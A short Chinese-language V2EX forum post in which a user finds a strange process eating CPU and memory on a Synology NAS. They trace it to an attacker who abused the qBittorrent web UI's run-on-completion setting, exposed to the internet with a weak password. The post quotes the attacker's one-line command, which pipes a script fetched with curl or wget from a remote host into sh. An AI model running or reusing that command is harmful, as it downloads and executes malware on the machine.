起因:
偶然发现群晖 cpu 内存占用率很高。
查看进程发现有个进程以 qbittornet 用户运行这一个 名叫./PHsyYPRT 进程,名字很古怪,占了 2 核 cpu ,30%内存。
起初怀疑是 qbit 问题,马上停止套件,进程消失。 但是又过了几天,又发现相同的进程。 一顿搜索
参考:
https://www.reddit.com/r/synology/comments/1co3toi/rogue_process_eating_ram/?tl=zh-hans发现攻击者可以在 web ui, 设置 torrent 下载完成时执行外部程序:
sh -c "(curl -sk
https://fulminare.top || wget --no-check-certificate -qO -
https://fulminare.top) | sh"
考虑到之前 web ui 曾开到公网过,且用了弱密码。被轻易爆破的可能性很大。
赶紧把 web ui 公网关掉。
这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。
https://www.v2ex.com/t/1137306
V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。
V2EX is a community of developers, designers and creative people.